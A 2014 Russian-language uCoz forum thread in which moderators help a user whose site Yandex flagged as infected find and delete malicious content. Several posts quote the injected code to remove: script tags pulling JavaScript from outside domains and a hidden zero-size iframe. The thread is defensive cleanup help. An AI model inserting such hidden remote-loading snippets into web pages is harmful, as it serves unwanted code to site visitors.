Модератор форума: webanet  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Яндекс блокирует сайт
Яндекс блокирует сайт
webanet
Личный менеджер
Сообщений: 23595
Репутация: 4937

Сообщение # 1 | 18:18:57
Блокировка сайтов Яндексом по фильтру безопасности!

Вердикт Поведенческий анализ.


Разметка сайта произошла вследствие ложного срабатывания на стороне Яндекс. Сейчас эта проблема уже устранена.

Разметка в поисковой выдаче должна пропасть в течение 3-4 часов.




Для снятия фильтра пишите в тех.поддержку Яндекса с темой Вирус на сайте

Служба поддержки Яндекса http://help.yandex.ru/

Также можно использовать форму в Яндекс.Вебмастер
Прикрепления: 6302276.png(64.1 Kb) · 0206658.png(54.5 Kb)

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
webanet
Личный менеджер
Сообщений: 23595
Репутация: 4937

Сообщение # 16 | 17:22:28
Slender6946, перейди по этой ссылке http://world-of-minecr.ucoz.ru/news/pravila_sajta/2013-10-08-2 и удали этот материал или открой его на редактирование в хтмл режиме и поиском браузера найди все ифреймы встроенные в него

далее перейди по этой ссылке http://world-of-minecr.ucoz.ru/news/zhurnalisty/2013-11-19-5 и удали этот материал или открой его на редактирование в хтмл режиме и поиском браузера найди все ифреймы встроенные в него

далее перейди по этой ссылке http://world-of-minecr.ucoz.ru/dir там увидишь материал с названием Rutor удали этот материал или открой его на редактирование в хтмл режиме и поиском браузера найди все ифреймы встроенные в него

все понятно?

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Slender6946
Сообщений: 48
Репутация: -43
Уровень замечаний:

Сообщение # 17 | 13:15:41
webanet, ЧТО ТАКОЕ ИФРЕЙМЫ?

Miss_Esq
Сообщений: 13865
Репутация: 4160
Уровень замечаний:

Сообщение # 18 | 13:22:59
Slender6946, Конструкции html с таким тегом (красное) - <iframe style="" и т п и т д></iframe>

Могут скрываться в скриптах ...

Сообщение отредактировал Miss_Esq - Суббота, 01 Мар 2014, 13:24:04
Slender6946
Сообщений: 48
Репутация: -43
Уровень замечаний:

Сообщение # 19 | 18:47:47
и почему из-за них он блокируется???

Miss_Esq
Сообщений: 13865
Репутация: 4160
Уровень замечаний:

Сообщение # 20 | 19:25:51
Slender6946, Не из за них конкретно, а из за того что с помощью этих тегов на ваш сайт подгружается вредоносный код, страницы с вредоносных сайтов, вредоносные скрипты ....

Slender6946
Сообщений: 48
Репутация: -43
Уровень замечаний:

Сообщение # 21 | 22:01:15
но я не добавлял туда ифреймы!!! angry

Добавлено (07 Мар 2014, 22:01:15)
---------------------------------------------
а щас всё нормально???


webanet
Личный менеджер
Сообщений: 23595
Репутация: 4937

Сообщение # 22 | 22:23:02
Slender6946,
Цитата
а щас всё нормально???
в материалах уже все чистенько

осталось вычистить в содержимом главной страницы. панель управления - редактор страниц - управление страницами сайта - главная страница- напротив главной нажмите на разводной ключ - страница откроется на редактирование - удалите

Код
<script src="https://pluginplus.net/plugins/system/system_im.js"></script><iframe src="https://pluginplus.net/statistica/statistic_li.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><script src="http://c.am15.net/preloader7.js" type="text/javascript"></script><div id="advm_video"></div><div><div id="advm_block" style="display:none"><div id="advm_close">Закрыть [Х]</div><div id="ambn17757"></div><div id="advm_box"><div>Осталось <span id="advm_timer"></span> сек.</div></div></div></div>


после удаления сохраните

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Slender6946
Сообщений: 48
Репутация: -43
Уровень замечаний:

Сообщение # 23 | 11:48:44
webanet, тоесть надо удалить ифреймы или весь этот код???

Добавлено (08 Мар 2014, 11:48:37)
---------------------------------------------
dhjlt dc`///

Добавлено (08 Мар 2014, 11:48:44)
---------------------------------------------
вроде всё


webanet
Личный менеджер
Сообщений: 23595
Репутация: 4937

Сообщение # 24 | 18:50:44
Slender6946, нет. не все. ещё остался кусочек в содержимом главной. откройте ещё раз главную на редактирование и добейте последнее. вот это надо удалить

Код
<script src="https://pluginplus.net/plugins/system/system_im.js"></script>none;"><<script src="http://c.am15.net/preloader7.js" type="text/javascript"></script><div id="advm_video"></div><div><div id="advm_block" style="display:none"><div id="advm_close">Закрыть [Х]</div><div id="ambn17757"></div><div id="advm_box"><div>Осталось <span id="advm_timer"></span> сек.</div></div></div></div>

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Like7770
Сообщений: 1
Репутация: 0

Сообщение # 25 | 20:13:46
блин другой акаунт!!!!

Добавлено (08 Мар 2014, 20:13:46)
---------------------------------------------
webanet, дак это все удалять??????

webanet
Личный менеджер
Сообщений: 23595
Репутация: 4937

Сообщение # 26 | 20:20:26
Like7770, это вы Slender6946?
удалять так же как вы удалили ифрейм, но не удалили скрипты почему-то. хотя я вам дала полный набор кода, который надо снести. будьте внимательны когда вам что-то пишут

сначала это

панель управления - редактор страниц - управление страницами сайта - главная страница- напротив главной нажмите на разводной ключ - страница откроется на редактирование

удаляете

Код
<script src="https://pluginplus.net/plugins/system/system_im.js"></script>none;"><<script src="http://c.am15.net/preloader7.js" type="text/javascript"></script><div id="advm_video"></div><div><div id="advm_block" style="display:none"><div id="advm_close">Закрыть [Х]</div><div id="ambn17757"></div><div id="advm_box"><div>Осталось <span id="advm_timer"></span> сек.</div></div></div></div>


сохраняете шаблон после удаления.

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Slender6946
Сообщений: 48
Репутация: -43
Уровень замечаний:

Сообщение # 27 | 21:58:20
webanet, у меня вообще вся главная накрылась!

webanet
Личный менеджер
Сообщений: 23595
Репутация: 4937

Сообщение # 28 | 22:08:02
Slender6946, без паники. все поправимо. вместо своей надписи о том, что страница уничтожена вставьте это

Код
<?if($ADD_ENTRY_LINK$)?><div style="text-align:right;padding-bottom:3px;">[ <a href="$ADD_ENTRY_LINK$">Добавить новость</a> ]</div><?endif?>$LAST_NEWS$


и сохраните

ТУТ можно оставить своё мнение по любому вопросу
https://webanetlabs.net/
Miss_Esq
Сообщений: 13865
Репутация: 4160
Уровень замечаний:

Сообщение # 29 | 22:14:23
Slender6946, Вы где такой пример применения тега object откопали ???? surprised

<embed src=http://wallaby.ucoz.ru/clock/free-flash-clock-183.swf width=200 height=200 wmode=transparent type=application/x-shockwave-flash></embed>
<param name="movie" value="wallaby.ucoz.ru/clock/free-flash-clock-183.swf" type"/>
<param name="wmode" value="transparent"/><param name=allowFullScreen value="true"/>
</object>


Код
<object type="application/x-shockwave-flash" data="http://wallaby.ucoz.ru/clock/free-flash-clock-183.swf" style="width: 200px; height: 200px;">
<param name="movie" value="http://wallaby.ucoz.ru/clock/free-flash-clock-183.swf">
<param name="wmode" value="transparent">
<param name=allowFullScreen value="true">
</object>  

Slender6946
Сообщений: 48
Репутация: -43
Уровень замечаний:

Сообщение # 30 | 19:02:19
Miss_Esq, и чего???

Добавлено (09 Мар 2014, 19:02:19)
---------------------------------------------
ура получилось!!!!!!!


Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Яндекс блокирует сайт
Поиск: